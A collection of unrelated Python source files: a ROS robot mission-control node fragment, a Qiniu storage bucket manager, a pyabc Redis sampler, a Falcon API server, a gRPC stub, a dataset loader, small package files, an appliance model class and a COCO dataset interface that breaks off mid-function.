            self.mission_timeout_pre = time_now
            self.mode_num = self.mode_step.crossbar_mode.value
            self.sequence_num = 1
        elif self.tunnel_mission_start:
            rospy.loginfo('mode change : tunnel mode')
            self.mission_timeout_pre = time_now
            self.mode_num = self.mode_step.tunnel_mode.value
            self.sequence_num = 1
        elif self.intersection_mission_start:
            rospy.loginfo('mode change : intersection mode')
            self.mission_timeout_pre = time_now
            self.mode_num = self.mode_step.intersection_mode.value
            self.sequence_num = 1
        elif self.construction_mission_start:
            rospy.loginfo('mode change : construction mode')
            self.mission_timeout_pre = time_now
            self.mode_num = self.mode_step.construction_mode.value
            self.sequence_num = 1

        if (time_now - self.mission_time_pre) >= 0.1:
            # rospy.loginfo('[normal] mission sequence publish, time: {0:.4f}'.format(time_now - self.mission_time_pre))
            self.mission_time_pre = time_now
            self.pub_seq_normal.publish(self.sequence_num)

        # TODO: publish mission start point
        if (time_now - self.pre_check_time_pre) >= 0.1:
            # rospy.loginfo(' pre check sequence publish, time: {0:.4f}'.format(time_now - self.pre_check_time_pre))
            self.pre_check_time_pre = time_now
            if not self.traffic_mission_success:
                self.pub_seq_traffic.publish(90)
            if not self.parking_mission_success and self.construction_mission_success:
                self.pub_seq_parking.publish(90)
            if not self.crossbar_mission_success and self.parking_mission_success:
                self.pub_seq_crossbar.publish(90)
            if not self.tunnel_mission_success and self.crossbar_mission_success:
                self.pub_seq_tunnel.publish(90)
            if not self.intersection_mission_success and self.traffic_mission_success:
                self.pub_seq_intersection.publish(90)
            if not self.construction_mission_success and self.intersection_mission_success:
                self.pub_seq_construction.publish(90)

    def fn_mission_publish(self):
        time_now = time.time()
        if self.mode_num == self.mode_step.traffic_mode.value:
            if (time_now - self.mission_time_pre) >= self.mission_time_delay:
                #rospy.loginfo('traffic mission sequence publish, time: ' + "{0:.4f}".format(time_now - self.mission_time_pre))
                self.mission_time_pre = time_now
                self.pub_seq_traffic.publish(self.sequence_num)
        elif self.mode_num == self.mode_step.parking_mode.value:
            if (time_now - self.mission_time_pre) >= self.mission_time_delay:
                #rospy.loginfo('parking mission sequence publish, time: ' + "{0:.4f}".format(time_now - self.mission_time_pre))
                self.mission_time_pre = time_now
                self.pub_seq_parking.publish(self.sequence_num)
        elif self.mode_num == self.mode_step.crossbar_mode.value:
            if (time_now - self.mission_time_pre) >= self.mission_time_delay:
                #rospy.loginfo('crossbar mission sequence publish, time: ' + "{0:.4f}".format(time_now - self.mission_time_pre))
                self.mission_time_pre = time_now
                self.pub_seq_crossbar.publish(self.sequence_num)
        elif self.mode_num == self.mode_step.tunnel_mode.value:
            if (time_now - self.mission_time_pre) >= self.mission_time_delay:
                #rospy.loginfo('tunnel mission sequence publish, time: ' + "{0:.4f}".format(time_now - self.mission_time_pre))
                self.mission_time_pre = time_now
                self.pub_seq_tunnel.publish(self.sequence_num)
        elif self.mode_num == self.mode_step.intersection_mode.value:
            if (time_now - self.mission_time_pre) >= self.mission_time_delay:
                #rospy.loginfo('intersection mission sequence publish, time: ' + "{0:.4f}".format(time_now - self.mission_time_pre))
                self.mission_time_pre = time_now
                self.pub_seq_intersection.publish(self.sequence_num)
        elif self.mode_num == self.mode_step.construction_mode.value:
            if (time_now - self.mission_time_pre) >= self.mission_time_delay:
                #rospy.loginfo('construction mission sequence publish, time: ' + "{0:.4f}".format(time_now - self.mission_time_pre))
                self.mission_time_pre = time_now
                self.pub_seq_construction.publish(self.sequence_num)
        else:
            if (time_now - self.mission_time_pre) >= self.mission_time_delay:
                rospy.logerr('[Error] Wrong Mission Mode')

        if self.mission_timeout > 0.1 and (time_now - self.mission_timeout_pre) > self.mission_timeout:
            rospy.logwarn('[warning !!] mode change fail !!')
            self.traffic_pre_check = False
            self.traffic_sign = False
            self.pub_seq_traffic.publish(99)
            self.pub_seq_parking.publish(99)
            self.pub_seq_crossbar.publish(99)
            self.pub_seq_tunnel.publish(99)
            self.pub_seq_intersection.publish(99)
            self.pub_seq_construction.publish(99)
            self.mode_num = self.mode_step.normal_mode.value
            self.sequence_num = 1

    def cb_image_receive(self, msg):
        time_now = time.time()

        if self.img_status == 'raw':
            img = self.cv_bridge.imgmsg_to_cv2(msg, "bgr8")
            msg = self.cv_bridge.cv2_to_compressed_imgmsg(img, "jpg")

        # TODO: publish sign image
        if (time_now - self.sign_check_time_pre) >= 0.01 and self.mode_num == self.mode_step.intersection_mode.value:
            #rospy.loginfo(' sign image publish, time: ' + "{0:.4f}".format(time_now - self.sign_check_time_pre))
            self.sign_check_time_pre = time_now
            self.pub_img_sign.publish(msg)

        # TODO: publish driving image
        if (time_now - self.driving_time_pre) >= 0.1:
            #rospy.loginfo(' driving image publish, time: ' + "{0:.4f}".format(time_now - self.driving_time_pre))
            self.driving_time_pre = time_now
            self.pub_img_driving.publish(msg)

        # TODO: publish mission image
        self.pub_img_mission.publish(msg)

    def cb_sequence_num(self, msg):
        rospy.loginfo('sequence change : ' + str(msg.data))
        if msg.data == 100:  # sequence end point
            self.traffic_mission_start = False
            self.parking_mission_start = False
            self.crossbar_mission_start = False
            self.tunnel_mission_start = False
            self.intersection_mission_start = False
            self.construction_mission_start = False
            if self.mode_num == self.mode_step.traffic_mode.value:
                self.traffic_mission_success = True
            elif self.mode_num == self.mode_step.parking_mode.value:
                self.parking_mission_success = True
            elif self.mode_num == self.mode_step.crossbar_mode.value:
                self.crossbar_mission_success = True
            elif self.mode_num == self.mode_step.tunnel_mode.value:
                self.tunnel_mission_success = True
            elif self.mode_num == self.mode_step.intersection_mode.value:
                self.intersection_mission_success = True
            elif self.mode_num == self.mode_step.construction_mode.value:
                self.construction_mission_success = True
            self.mode_num = self.mode_step.normal_mode.value
            self.sequence_num = 1
        elif msg.data == 91:
            self.traffic_mission_start = True
        elif msg.data == 92:
            self.parking_mission_start = True
        elif msg.data == 93:
            self.crossbar_mission_start = True
        elif msg.data == 94:
            self.tunnel_mission_start = True
        elif msg.data == 95:
            self.intersection_mission_start = True
        elif msg.data == 96:
            self.construction_mission_start = True
        else:
            self.sequence_num = msg.data
            if self.mode_num == self.mode_step.traffic_mode.value:
                self.pub_seq_traffic.publish(self.sequence_num)
            elif self.mode_num == self.mode_step.parking_mode.value:
                self.pub_seq_parking.publish(self.sequence_num)
            elif self.mode_num == self.mode_step.crossbar_mode.value:
                self.pub_seq_crossbar.publish(self.sequence_num)
            elif self.mode_num == self.mode_step.tunnel_mode.value:
self.pub_seq_tunnel.publish(self.sequence_num) elif self.mode_num == self.mode_step.intersection_mode.value: self.pub_seq_intersection.publish(self.sequence_num) elif self.mode_num == self.mode_step.construction_mode.value: self.pub_seq_construction.publish(self.sequence_num) self.mission_timeout_pre = time.time() def cb_delay_change(self, msg): self.mission_time_delay = msg.data def cb_timeout_change(self, msg): self.mission_timeout = msg.data @staticmethod def main(): rospy.spin() if __name__ == '__main__': rospy.init_node('Control_Node') node = ControlNode() node.main()
python
# -*- coding: utf-8 -*-

from qiniu import config
from qiniu.utils import urlsafe_base64_encode, entry
from qiniu import http


class BucketManager(object):
    """Bucket management class

    Implements bucket resource management and the batch operation
    interfaces. See the API reference for the exact specification:
    http://developer.qiniu.com/docs/v6/api/reference/rs/

    Attributes:
        auth: account access key pair, an Auth object
    """

    def __init__(self, auth):
        self.auth = auth

    def list(self, bucket, prefix=None, marker=None, limit=None, delimiter=None):
        """List by prefix:

        1. On the first request, marker = None
        2. Whatever the err value is, always check ret.get('items') first
        3. When there is no more data, err returns EOF and marker returns
           None (but do not rely on this to detect the end of the listing)

        Specification:
        http://developer.qiniu.com/docs/v6/api/reference/rs/list.html

        Args:
            bucket:     bucket name
            prefix:     listing prefix
            marker:     listing marker
            limit:      maximum number of entries returned per listing
            delimiter:  directory delimiter

        Returns:
            a dict like {"hash": "<Hash string>", "key": "<Key string>"}
            a ResponseInfo object
            an EOF flag.
        """
        options = {
            'bucket': bucket,
        }
        if marker is not None:
            options['marker'] = marker
        if limit is not None:
            options['limit'] = limit
        if prefix is not None:
            options['prefix'] = prefix
        if delimiter is not None:
            options['delimiter'] = delimiter

        url = 'http://{0}/list'.format(config.get_default('default_rsf_host'))
        ret, info = self.__get(url, options)

        eof = False
        if ret and not ret.get('marker'):
            eof = True

        return ret, eof, info

    def stat(self, bucket, key):
        """Get file info:

        Retrieves the metadata of a resource without returning its content.
        Specification:
        http://developer.qiniu.com/docs/v6/api/reference/rs/stat.html

        Args:
            bucket: bucket containing the resource
            key:    file name of the resource

        Returns:
            a dict like:
                {
                    "fsize":        5122935,
                    "hash":         "ljfockr0lOil_bZfyaI2ZY78HWoH",
                    "mimeType":     "application/octet-stream",
                    "putTime":      13603956734587420
                }
            a ResponseInfo object
        """
        resource = entry(bucket, key)
        return self.__rs_do('stat', resource)

    def delete(self, bucket, key):
        """Delete file:

        Deletes the specified resource. Specification:
        http://developer.qiniu.com/docs/v6/api/reference/rs/delete.html

        Args:
            bucket: bucket containing the resource
            key:    file name of the resource

        Returns:
            a dict: None on success, {"error": "<errMsg string>"} on failure
            a ResponseInfo object
        """
        resource = entry(bucket, key)
        return self.__rs_do('delete', resource)

    def rename(self, bucket, key, key_to):
        """Rename file:

        Renames a resource; essentially a move operation.

        Args:
            bucket: bucket containing the resource
            key:    source file name
            key_to: target file name

        Returns:
            a dict: None on success, {"error": "<errMsg string>"} on failure
            a ResponseInfo object
        """
        return self.move(bucket, key, bucket, key_to)

    def move(self, bucket, key, bucket_to, key_to):
        """Move file:

        Moves a resource from one bucket to another. Specification:
        http://developer.qiniu.com/docs/v6/api/reference/rs/move.html

        Args:
            bucket:     source bucket
            bucket_to:  target bucket
            key:        source file name
            key_to:     target file name

        Returns:
            a dict: None on success, {"error": "<errMsg string>"} on failure
            a ResponseInfo object
        """
        resource = entry(bucket, key)
        to = entry(bucket_to, key_to)
        return self.__rs_do('move', resource, to)

    def copy(self, bucket, key, bucket_to, key_to):
        """Copy file:

        Copies the specified resource under a new name. Specification:
        http://developer.qiniu.com/docs/v6/api/reference/rs/copy.html

        Args:
            bucket:     source bucket
            bucket_to:  target bucket
            key:        source file name
            key_to:     target file name

        Returns:
            a dict: None on success, {"error": "<errMsg string>"} on failure
            a ResponseInfo object
        """
        resource = entry(bucket, key)
        to = entry(bucket_to, key_to)
        return self.__rs_do('copy', resource, to)

    def fetch(self, url, bucket, key=None):
        """Fetch file:

        Fetches a resource from the given URL and stores it in the specified
        bucket. Specification:
        http://developer.qiniu.com/docs/v6/api/reference/rs/fetch.html

        Args:
            url:    the source URL
            bucket: target bucket
            key:    target file name

        Returns:
            a dict: None on success, {"error": "<errMsg string>"} on failure
            a ResponseInfo object
        """
        resource = urlsafe_base64_encode(url)
        to = entry(bucket, key)
        return self.__io_do('fetch', resource, 'to/{0}'.format(to))

    def prefetch(self, bucket, key):
        """Prefetch file from the mirror origin:

        Fetches the resource from the mirror origin site into the bucket,
        overwriting the resource if it already exists. Specification:
        http://developer.qiniu.com/docs/v6/api/reference/rs/prefetch.html

        Args:
            bucket: bucket containing the resource
            key:    file name of the resource to fetch

        Returns:
            a dict: None on success, {"error": "<errMsg string>"} on failure
            a ResponseInfo object
        """
        resource = entry(bucket, key)
        return self.__io_do('prefetch', resource)

    def change_mime(self, bucket, key, mime):
        """Change the file's mimeType:

        Modifies the mime type of the specified resource. Specification:
        http://developer.qiniu.com/docs/v6/api/reference/rs/chgm.html

        Args:
            bucket: bucket containing the resource
            key:    file name of the resource
            mime:   target mimeType
        """
        resource = entry(bucket, key)
        encode_mime = urlsafe_base64_encode(mime)
        return self.__rs_do('chgm', resource, 'mime/{0}'.format(encode_mime))

    def batch(self, operations):
        """Batch operations:

        Performs multiple resource management operations in a single
        request. Specification:
        http://developer.qiniu.com/docs/v6/api/reference/rs/batch.html

        Args:
            operations: array of resource management operations, which can
                        be built with the build_batch_* helpers below

        Returns:
            a dict like:
                [
                    { "code": <HttpCode int>, "data": <Data> },
                    { "code": <HttpCode int> },
                    { "code": <HttpCode int> },
                    { "code": <HttpCode int> },
                    { "code": <HttpCode int>, "data": { "error": "<ErrorMessage string>" } },
                    ...
                ]
            a ResponseInfo object
        """
        url = 'http://{0}/batch'.format(config.get_default('default_rs_host'))
        return self.__post(url, dict(op=operations))

    def buckets(self):
        """List all buckets:

        Returns all bucket names under the given account.

        Returns:
            a list like: [ <Bucket1>, <Bucket2>, ... ]
            a ResponseInfo object
        """
        return self.__rs_do('buckets')

    def __rs_do(self, operation, *args):
        return self.__server_do(config.get_default('default_rs_host'), operation, *args)

    def __io_do(self, operation, *args):
        return self.__server_do(config.get_default('default_io_host'), operation, *args)

    def __server_do(self, host, operation, *args):
        cmd = _build_op(operation, *args)
        url = 'http://{0}/{1}'.format(host, cmd)
        return self.__post(url)

    def __post(self, url, data=None):
        return http._post_with_auth(url, data, self.auth)

    def __get(self, url, params=None):
        return http._get(url, params, self.auth)


def _build_op(*args):
    return '/'.join(args)


def build_batch_copy(source_bucket, key_pairs, target_bucket):
    return _two_key_batch('copy', source_bucket, key_pairs, target_bucket)


def build_batch_rename(bucket, key_pairs):
    return build_batch_move(bucket, key_pairs, bucket)


def build_batch_move(source_bucket, key_pairs, target_bucket):
    return _two_key_batch('move', source_bucket, key_pairs, target_bucket)


def build_batch_delete(bucket, keys):
    return _one_key_batch('delete', bucket, keys)


def build_batch_stat(bucket, keys):
    return _one_key_batch('stat', bucket, keys)


def _one_key_batch(operation, bucket, keys):
    return [_build_op(operation, entry(bucket, key)) for key in keys]


def _two_key_batch(operation, source_bucket, key_pairs, target_bucket):
    if target_bucket is None:
        target_bucket = source_bucket
    return [_build_op(operation, entry(source_bucket, k), entry(target_bucket, v)) for k, v in key_pairs.items()]
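# A hypothetical usage sketch for the batch helpers above: delete several
# keys in one request. The access key, secret key, bucket and file names are
# placeholders.
if __name__ == '__main__':
    from qiniu import Auth

    bucket_manager = BucketManager(Auth('access_key', 'secret_key'))
    operations = build_batch_delete('my-bucket', ['a.jpg', 'b.jpg'])
    ret, info = bucket_manager.batch(operations)
    print(info)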
python
import numpy as np
import pickle
from time import sleep

import cloudpickle
from redis import StrictRedis

from ...sampler import Sampler
from .cmd import (SSA, N_EVAL, N_ACC, N_REQ, ALL_ACCEPTED,
                  N_WORKER, QUEUE, MSG, START,
                  SLEEP_TIME, BATCH_SIZE)
from .redis_logging import logger


class RedisEvalParallelSampler(Sampler):
    """
    Redis based low latency sampler.
    This sampler performs well in distributed environments. It is usually
    faster than the :class:`pyabc.sampler.DaskDistributedSampler` for
    short model evaluation runtimes. The longer the model evaluation times,
    the smaller the advantage becomes. It requires a running Redis server
    as broker.

    This sampler requires workers to be started via the command
    ``abc-redis-worker``. An example call might look like
    ``abc-redis-worker --host=123.456.789.123 --runtime=2h`` to connect to
    a Redis server on IP ``123.456.789.123`` and to terminate the worker
    after finishing the first population that ends 2 hours after worker
    start. So the actual runtime might be longer than 2h.
    See ``abc-redis-worker --help`` for its options.

    Use the command ``abc-redis-manager`` to retrieve info about, and stop,
    the running workers.

    Start as many workers as you wish. Workers can be dynamically added
    during the ABC run.

    Parameters
    ----------

    host: str, optional
        IP address or name of the Redis server.
        Default is "localhost".

    port: int, optional
        Port of the Redis server.
        Default is 6379.

    password: str, optional
        Password for a protected server. Default is None (no protection).

    batch_size: int, optional
        Number of model evaluations the workers perform before contacting
        the REDIS server. Defaults to 1. Increase this value if model
        evaluation times are short or the number of workers is large
        to reduce communication overhead.
    """

    def __init__(self,
                 host: str = "localhost",
                 port: int = 6379,
                 password: str = None,
                 batch_size: int = 1):
        super().__init__()
        logger.debug(
            f"Redis sampler: host={host} port={port}")
        # handles the connection to the redis-server
        self.redis = StrictRedis(host=host, port=port, password=password)
        self.batch_size = batch_size

    def n_worker(self):
        """
        Get the number of connected workers.

        Returns
        -------

        Number of workers connected.
""" return self.redis.pubsub_numsub(MSG)[0][-1] def sample_until_n_accepted( self, n, simulate_one, max_eval=np.inf, all_accepted=False): # open pipeline pipeline = self.redis.pipeline() # write initial values to pipeline self.redis.set( SSA, cloudpickle.dumps((simulate_one, self.sample_factory))) pipeline.set(N_EVAL, 0) pipeline.set(N_ACC, 0) pipeline.set(N_REQ, n) pipeline.set(ALL_ACCEPTED, int(all_accepted)) # encode as int pipeline.set(N_WORKER, 0) pipeline.set(BATCH_SIZE, self.batch_size) # delete previous results pipeline.delete(QUEUE) # execute all commands pipeline.execute() id_results = [] # publish start message self.redis.publish(MSG, START) # wait until n acceptances while len(id_results) < n: # pop result from queue, block until one is available dump = self.redis.blpop(QUEUE)[1] # extract pickled object particle_with_id = pickle.loads(dump) # append to collected results id_results.append(particle_with_id) # wait until all workers done while int(self.redis.get(N_WORKER).decode()) > 0: sleep(SLEEP_TIME) # make sure all results are collected while self.redis.llen(QUEUE) > 0: id_results.append(pickle.loads(self.redis.blpop(QUEUE)[1])) # set total number of evaluations self.nr_evaluations_ = int(self.redis.get(N_EVAL).decode()) # delete keys from pipeline pipeline = self.redis.pipeline() pipeline.delete(SSA) pipeline.delete(N_EVAL) pipeline.delete(N_ACC) pipeline.delete(N_REQ) pipeline.delete(ALL_ACCEPTED) pipeline.delete(BATCH_SIZE) pipeline.execute() # avoid bias toward short running evaluations (for # dynamic scheduling) id_results.sort(key=lambda x: x[0]) id_results = id_results[:n] results = [res[1] for res in id_results] # create 1 to-be-returned sample from results sample = self._create_empty_sample() for j in range(n): sample += results[j] return sample
python
# -*- coding: utf-8 -*- import falcon.asgi import log from app.api.common import base from app.api.v1.auth import login from app.api.v1.member import member from app.api.v1.menu import menu from app.api.v1.statistics import image from app.api.v1.twitter import tweet from app.api.v1.user import users from app.database import db_session, init_session from app.errors import AppError from app.middleware import AuthHandler, JSONTranslator, DatabaseSessionManager, CORSMiddleware, WebsocketHandler LOG = log.get_logger() class App(falcon.asgi.App): def __init__(self, *args, **kwargs): super(App, self).__init__(*args, **kwargs) LOG.info("API Server is starting") self.add_route("/", base.BaseResource()) self.add_route("/v1/login", login.Auth()) self.add_route("/v1/statistics/count/image", image.Count()) self.add_route("/v1/menu/list", menu.Menu()) self.add_route("/v1/users", users.Collection()) self.add_route("/v1/users/{user_id}", users.Item()) self.add_route("/v1/users/self/login", users.Self()) self.add_route("/v1/member/list", member.List()) self.add_route("/v1/member/customes", member.Customes()) self.add_route("/v1/member/tags", member.Tags()) self.add_route("/v1/member/tweets", member.Tweets()) self.add_route("/v1/member/tweet/live", member.TweetLive()) self.add_route("/v1/member/youtube/channel/list", member.Collection()) self.add_route("/v1/twitter", tweet.TwitterList()) self.add_route("/v1/tweet/draws", tweet.Draws()) self.add_route("/v1/tweet/draws/live", tweet.DrawsLive()) self.add_route("/v1/tweet/custom/draws", tweet.CustomDraws()) self.add_route("/v1/tweet/custom/tags", tweet.CustomTags()) self.add_route("/v1/tweet/renewer/draws", tweet.RenewerDraws()) self.add_route("/v1/tweet/detail", tweet.TweetInfo()) self.add_route("/v1/tweet/ids", tweet.TweetIds()) self.add_route("/v1/tweet/member/{memeber_id}", users.Self()) self.add_route("/robots.txt", DenyCrawlers()) self.add_error_handler(AppError, AppError.handle) class DenyCrawlers(object): async def on_get(self, req, resp): resp.body = "User-agent: *\nDisallow: /\n" init_session() middleware = [CORSMiddleware(), AuthHandler(), JSONTranslator(), DatabaseSessionManager(db_session), WebsocketHandler()] application = App(middleware=middleware, cors_enable=True) if __name__ == "__main__": # from wsgiref import simple_server # # httpd = simple_server.make_server("127.0.0.1", 8000, application) # httpd.serve_forever() import uvicorn uvicorn.run(application, host="0.0.0.0", port=8000, log_level="info", ws_ping_interval=10, ws_ping_timeout=60 * 60, timeout_keep_alive=60 * 5)
python
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc

from . import ParameterConstraintProvider_pb2 as ParameterConstraintProvider__pb2


class ParameterConstraintsProviderStub(object):
    """Feature: Parameter Constraint Provider

    Allows a server to apply constraints on specific command parameters after design time.
    It is recommended to specify the constraints in the Feature Definitions whenever possible.
    The constraints given by this Feature act as a logical AND to any constraints already defined in the Feature
    Definition. As an example: A constrained type has a Pattern Constraint, then the ParameterConstraintProvider
    specifies an additional Pattern Constraint - in this case the underlying SiLA Type has to follow BOTH Patterns
    defined. The constraints can be retrieved by reading and subscribing to its dynamic property.

    Example use-case: Loading and setting the positions a mobile robot can move to at runtime.
    """

    def __init__(self, channel):
        """Constructor.

        Args:
            channel: A grpc.Channel.
        """
        self.Subscribe_ParametersConstraints = channel.unary_stream(
            '/sila2.org.silastandard.core.parameterconstraintsprovider.v1.ParameterConstraintsProvider/Subscribe_ParametersConstraints',
            request_serializer=ParameterConstraintProvider__pb2.Subscribe_ParametersConstraints_Parameters.SerializeToString,
            response_deserializer=ParameterConstraintProvider__pb2.Subscribe_ParametersConstraints_Responses.FromString,
        )


class ParameterConstraintsProviderServicer(object):
    """Feature: Parameter Constraint Provider

    Allows a server to apply constraints on specific command parameters after design time.
    It is recommended to specify the constraints in the Feature Definitions whenever possible.
    The constraints given by this Feature act as a logical AND to any constraints already defined in the Feature
    Definition. As an example: A constrained type has a Pattern Constraint, then the ParameterConstraintProvider
    specifies an additional Pattern Constraint - in this case the underlying SiLA Type has to follow BOTH Patterns
    defined. The constraints can be retrieved by reading and subscribing to its dynamic property.

    Example use-case: Loading and setting the positions a mobile robot can move to at runtime.
    """

    def Subscribe_ParametersConstraints(self, request, context):
        """Parameters Constraints
        Parameter Constraints that constrain any specified parameters within this structure
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')


def add_ParameterConstraintsProviderServicer_to_server(servicer, server):
    rpc_method_handlers = {
        'Subscribe_ParametersConstraints': grpc.unary_stream_rpc_method_handler(
            servicer.Subscribe_ParametersConstraints,
            request_deserializer=ParameterConstraintProvider__pb2.Subscribe_ParametersConstraints_Parameters.FromString,
            response_serializer=ParameterConstraintProvider__pb2.Subscribe_ParametersConstraints_Responses.SerializeToString,
        ),
    }
    generic_handler = grpc.method_handlers_generic_handler(
        'sila2.org.silastandard.core.parameterconstraintsprovider.v1.ParameterConstraintsProvider', rpc_method_handlers)
    server.add_generic_rpc_handlers((generic_handler,))
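# A hypothetical client-side usage sketch (it would normally live outside
# this generated module); the server address is made up. The unary-stream
# call yields one response per constraint update.
def subscribe_constraints_sketch(address='localhost:50052'):
    channel = grpc.insecure_channel(address)
    stub = ParameterConstraintsProviderStub(channel)
    parameters = ParameterConstraintProvider__pb2.Subscribe_ParametersConstraints_Parameters()
    for response in stub.Subscribe_ParametersConstraints(parameters):
        print(response)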
python
# -*- coding: utf-8 -*- from __future__ import absolute_import from __future__ import division from __future__ import print_function import csv import numpy as np import os import sys from observations.util import maybe_download_and_extract def tobacco(path): """Households Tobacco Budget Share a cross-section from 1995-96 *number of observations* : 2724 *observation* : individuals *country* : Belgium A dataframe containing : occupation a factor with levels (bluecol,whitecol,inactself), the last level being inactive and self-employed region a factor with levels (flanders,wallon,brussels) nkids number of kids of more than two years old nkids2 number of kids of less than two years old nadults number of adults in household lnx log of total expenditures stobacco budgetshare of tobacco salcohol budgetshare of alcohol age age in brackets (0-4) National Institute of Statistics (NIS), Belgium. Args: path: str. Path to directory which either stores file or otherwise file will be downloaded and extracted there. Filename is `tobacco.csv`. Returns: Tuple of np.ndarray `x_train` with 2724 rows and 9 columns and dictionary `metadata` of column headers (feature names). """ import pandas as pd path = os.path.expanduser(path) filename = 'tobacco.csv' if not os.path.exists(os.path.join(path, filename)): url = 'http://dustintran.com/data/r/Ecdat/Tobacco.csv' maybe_download_and_extract(path, url, save_file_name='tobacco.csv', resume=False) data = pd.read_csv(os.path.join(path, filename), index_col=0, parse_dates=True) x_train = data.values metadata = {'columns': data.columns} return x_train, metadata
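# A short usage sketch; the path is hypothetical, and the CSV is downloaded
# on first use. The expected shape matches the docstring above.
if __name__ == '__main__':
    x_train, metadata = tobacco('~/observations_data')
    print(x_train.shape)        # expected: (2724, 9)
    print(metadata['columns'])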
python
from .wheel import Wheel from .tree import SyncTree
python
from .exceptions import ApigeeError
python
"""Const for Velbus.""" DOMAIN = "velbus" CONF_MEMO_TEXT = "memo_text" SERVICE_SET_MEMO_TEXT = "set_memo_text"
python
# -*- coding: utf-8 -*-
from typing import List, Optional, Tuple

from .signal import Signal
from .light import Light
from .tv import TV


class Appliance:
    def __str__(self):
        return f"{self.__class__.__name__}: {self.nickname}"

    def __init__(self, data: dict) -> None:
        self._set_member(data)

    def update(self, data: dict) -> None:
        self._set_member(data)

    def _set_member(self, data: dict) -> None:
        self.id: str = data["id"]
        self.model: dict = data["model"]
        self.nickname: str = data["nickname"]
        self.name: str = data["nickname"]  # alias for nickname
        self.image: str = data["image"]
        self.type: str = data["type"]
        self.settings: dict = data["settings"]
        self.aircon: dict = data["aircon"]
        self.light: Light = Light(self.id, data["light"]) if self.type == "LIGHT" else None
        self.tv: TV = TV(self.id, data["tv"]) if self.type == "TV" else None
        self.signals: List = [Signal(**signal) for signal in data["signals"]]

    def signal(self, name: str) -> Tuple[Optional[Signal], bool]:
        result: Optional[Signal] = next(filter(lambda x: name == x.name, self.signals), None)
        return result, (result is not None)
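# A small hypothetical helper showing the tuple returned by signal():
# the second element tells whether the lookup succeeded.
def find_signal_or_report(appliance: Appliance, name: str) -> Optional[Signal]:
    signal, found = appliance.signal(name)
    if not found:
        print(f"appliance {appliance.nickname} has no signal named {name!r}")
    return signal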
python
""" COCO provides a simple way to use the coco data set thru a standardized interface. Implementing this module can reduce complexity in the code for gathering and preparing "Coco data set" data. Besides that does the module provide a standardized and simple interface which could be used with any data set containing image file locations and bboxes. ######### # USAGE # ######### # set category filters filters param_coco_cat_filters = [['person'], ['car'], ['bus'], ['truck']] # set coco dataset locations param_coco_annotation_file = '..\\COCO\\annotations_trainval2017\\annotations\\instances_train2017.json' param_coco_img_dir = '..\\COCO\\annotations_trainval2017\\images\\train2017\\' # load data set coco = COCO.CocoDatasetInterface(param_coco_annotation_file, param_coco_img_dir) data_x, data_y, data_dict_cat = coco.get_category_labeled_images(param_coco_cat_filters) ######################## # STANDARD DATA FORMAT # ######################## data_x is a list of image file locations [image_file_locations, ...] data_y is a list with labels [[[bbox1_img1, bbox1_category_img1], [bbox2_img1, bbox2_category_img1], ...], [[bbox1_img2, bbox1_category_img2], [bbox2_img2, bbox2_category_img2], ...], ...] The bboxN_imgN variables specify the actual bboxes in format [x,y,width,height] where x and y are the left top corner position of the bbox. """ from pycocotools.coco import COCO from BasicLib.BasicFunctions import * def show_coco_data_point(img, label_list, load_image_from_file=False): """ Display coco data set image and labels. :param img: loaded image of image file location :param label_list: labels :param load_image_from_file: interprets 'img' as file location when True. """ image = img if load_image_from_file: image = load_image(img) for bbox, category in label_list: pt1 = (int(bbox[0]), int(bbox[1])) pt2 = (int(pt1[0] + bbox[2]), int(pt1[1] + bbox[3])) color = (np.random.random((1, 3)) * 255).tolist()[0] cv2.rectangle(image, pt1, pt2, color, 2) show_image(image) class CocoDatasetInterface: """ This class forms a easy to use interface, meant to serve the data to a machine learning algorithm. Implementing this class can reduce complexity in the code for gathering and preparing data. Besides that does the class provide a standardized and simple interface which could be used with any data set containing image file locations and bboxes. EXAMPLE: from DataLibrary.COCO import * coco_annotation_file = '..\\COCO\\annotations_trainval2017\\annotations\\instances_train2017.json' coco_image_folder = '..\\COCO\\annotations_trainval2017\\images\\train2017\\' coco = CocoDatasetInterface(coco_annotation_file, coco_image_folder) images, labels, cat_dict = coco.get_category_labeled_images([['person'], ['car', 'bicycle', 'dog']]) coco.print_available_categories() show_coco_data_point(images[0], labels[0], True) """ def __init__(self, coco_ann_file, coco_img_dir): """ Initialize class. 
:param coco_ann_file: file location of the COCO data set annotation file :param coco_img_dir: file location of the COCO data set image files """ # self.coco_annotation_file = coco_ann_file self.coco_image_folder = coco_img_dir self.coco = COCO(coco_ann_file) self.categories = self.coco.loadCats(self.coco.getCatIds()) self.filtered_category_ids = None def print_available_categories(self): """Prints all the Coco data set categories.""" print("ID: Category: Super Category:") for cat in self.categories: print("{:2} {:15} {}".format(cat['id'], cat['name'], cat['supercategory'])) print() def get_images_ids(self, cat_nested_list): """ Returns list of image id's of images which meet the given category filter. These id's can be used to load the image specifications. :param cat_nested_list: is a list of lists, each inner list describing the items which has to be in the image in the following format: [['car'], ['cat', 'horse']] :return: list of image specifications, list of category id's """ img_id_list = [] total_cat_list = [] for cat_list in cat_nested_list: cat_id_list = self.coco.getCatIds(catNms=cat_list) total_cat_list += cat_id_list img_id_list += self.coco.getImgIds(catIds=cat_id_list) img_spec_list = self.coco.loadImgs(set(img_id_list)) total_cat_list = list(set(total_cat_list)) return img_spec_list, total_cat_list def build_category_dict(self, cat_list): """ Creates two dictionaries linking the coco category id's to the normalized id's and the category names to their normalized id's. These Dictionaries can be used to make id normalization and id to name linking easy. Returns two dictionaries.: cat_dict[0 .. n_categories] => cat_name cat_translate_dict[coco_cat_id] => normalized_cat :param cat_list: list of coco category id's :return: cat_dict, cat_translate_dict """ cat_spec_list = self.coco.loadCats(cat_list) cat_dict = {} cat_translate_dict = {} for cat_spec, normalized_id in zip(cat_spec_list, range(len(cat_spec_list))): cat_dict[normalized_id] = cat_spec['name'] cat_translate_dict[cat_spec['id']] = normalized_id return cat_dict, cat_translate_dict def load_image_annotations(self, img_spec, cat_translate_dict, cat_list): """ Returns annotations list bboxes in format [[x,y,width,height], bbox_category_id], ...] for the given image_spec, if bbox category is in cat_list. :param img_spec: coco image specification :param cat_translate_dict: cat_translate_dict[coco_cat_id] => normalized_cat :param cat_list: list of coco category id's :return: list bboxes in format [[x,y,width,height], bbox_category_id], ...] """ img_bboxes = [] ann_count_per_cat = [0] * len(cat_list) ann_spec_list = self.coco.loadAnns(self.coco.getAnnIds(imgIds=img_spec['id'])) for ann_spec in ann_spec_list: if 